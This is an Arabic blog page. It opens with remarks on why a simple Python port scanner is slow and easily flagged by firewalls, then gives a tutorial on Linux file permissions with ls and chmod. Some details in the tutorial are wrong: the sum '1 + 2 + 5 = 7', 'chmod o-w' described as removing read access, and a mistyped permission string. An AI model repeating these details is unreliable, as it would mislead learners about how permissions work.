لكن هل هذا البرنامج عملي ؟ , بصراحة هذا البرنامج يعمل و لكن هنالك الكثير من الامور الذي يجب توضيحها 
  • اولا هذا البرنامج سيكون بطيء بشكل كبير حيث يتم تنفيذه بشكل خطي و اذا اردنا تسريعه يجب ان يتم التنفيذ بأستخدام التنفيذ متزامن (concurrent execution ) .
  • عملية مسح المنافذ (port scan ) باستخدام جميع المنافذ و بالتسلسل و بدون وجود وقت انتظار سيجعل ابسط برنامج جدار نار (Firewall) ينذر المستخدم .
  • عملية المسح باستخدام عملية الاتصال كاملة , "مصافحة برتوكول TCP" الكاملة بطيئة و مكشوفة للبرامج جدران النار.
في النهاية هذا رابط لموضوع عن برمجة الشبكات ببايثون بالتفصيل :



الاثنين، 6 سبتمبر 2021

دورة تعلم Bash (الأذونات) : الجزء الثاني

 بسم الله الرحمن الرحيم

الأذونات (Permissions):

نظام لينكس صمم منذ البداية في بيئة يتعدد فيها المستخدمين , لذا فأن النظام يمنحك القدرة على التحكم بكل ملف و مجلد و من يستطيع الوصول له , فتستطيع جعل المستخدم يتمكن من الكتابة في ملف و لكن لا يستطيع قراءته و العكس صحيح , و تستطيع منح مجموعة من المستخدمين صلاحية القراءة و التنفيذ بدون التعديل .

  • كيف اعرف الأذونات على أي ملف أو مجلد :

بواسطة الأمر ls فقط ارفق الأمر ls بعلامة -l :

abgoor@DESKTOP:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1183448 Jun 18  2020 /bin/bash

لنبدأ من بداية سطر المعطيات أول حرف في السطر هو - , هذا الحرف يدل على نوع الملف كما في الصورة التالية :

و الأن لتقسيم الصلاحيات :

مالك الملف و المجموعة موجودة في معطيات الأمر ls :


شرح الصلاحيات :


في نظام لينكس تستطيع تعديل هذه الأذونات بواسطة الأمر chmod , و سوف نستخدمه لتطبيق الأمثلة لفهم أكبر للأذونات في نظام لينكس , و لمثالنا قم بأنشاء المجلد test و الملف test.txt بداخل المجلد ( أذا لم تقرأ الجزء الأول من هذه التدوينة فأنصحك بذلك على هذا الرابط ) .

abgoor@DESKTOP:~$ mkdir test
abgoor@DESKTOP:~$ cd test
abgoor@DESKTOP:~$ touch test.txt

لنعرض أولا الأذونات على الملف test.txt باستخدام الأمر ls :

abgoor@DESKTOP:~$ ls -l test.txt
-rw_r--r-- 1 abgoor abgoor 1183448 Jun 18  2020 test.txt

حاول قراءة الأذونات على الملف , ستلاحظ بأنك تستطيع قراءة الملف و الكتابة و التعديل , المجموعة التي تنتمي لها و باقي المستخدمين يستطعون قراءة الملف فقط .

لنفترض بأنك تريد بأن تسمح للمجموعة بالكتابة باستخدام الأمر chmod :

abgoor@DESKTOP:~$ chmod g+w test.txt


الحرف g يرمز للمجموعة (group) و الأشارة + تدل على أنك ستضيف أذن الكتابة , و لنفترض بأنك تريد بأن تمنع الأخرين من قراءة الملف فقط نفذ الأمر كالتالي :

abgoor@DESKTOP:~$ chmod o-w test.txt

و هذه الصورة تحمل الرموز الخاصة الحرفية :

طبعا هناك الطريقة باستخدام القيم الرقمية لتعديل الأذونات , كل أذن له قيمة و لكي تحصل على القيمة النهائية أجمع القيم و ستحصل على القيمة الخاصة بالأذن , في هذا الجدول ستحصل على جميع القيم :


لنفترض بأنك تريد أن تعطي نفسك جميع الأذونات سنجمع 1 + 2 + 5 = 7 , و لنعطي المجموعة حق التنفيذ و القراءة 4 + 1 = 5 , أما الباقية فلن نعطيهم أي أذن :

abgoor@DESKTOP:~$ chmod 750 test.txt


تذكر الترتيب في الأرقام في رقم الأذونات , من اليسار لليمين المالك للملف ثم المجموعة و أخيرا باقي المستخدمين .

حاول أن تغير الأذونات للمالك الملف و جرب أن تحاول حذف الملف أو قراءة محتوياته , و الأن الى نقطة تختلف في المجلدات كما ترى لا يمكن تنفيذ المجلد (execute) , لكن هذا الأذن يمكنك من الوصول لملف بداخل مجلد حتى لو لم تكن لديك الصلاحية لقراءة محتويات المجلد أو التعديل على محتوياته

abgoor@DESKTOP:~$ date > test.txt
abgoor@DESKTOP:~$ cd ..
abgoor@DESKTOP:~$ chmod 111 test/ 

 في السطر الأول قمنا بحفظ معطيات الأمر date في ملفنا test.txt ثم غيرنا المجلد الحالي الى المجلد الأعلى في المسار , و غيرنا تصريح مجلدنا test إلى التنفيذ فقط , جرب أن تنفذ الأمر ls على المجلد test :

abgoor@DESKTOP:~$ ls test/
ls: cannot open directory 'test/': Permission denied 

 و اﻷن جرب الأمر cat لعرض محتويات الملف test.txt بداخل المجلد test :

abgoor@DESKTOP:~$ cat test/test.txt
Tue  7 Sep 01:58:17 +04 2021 
 

في النهاية هذا الجزء نصيحة حاول ألا تقوم بتغير أذونات الملفات الخاصة بالنظام فهذا قد يؤثر على عمل نظامك , في الجزء القادم سنبدأ في كتابة أو برامجنا .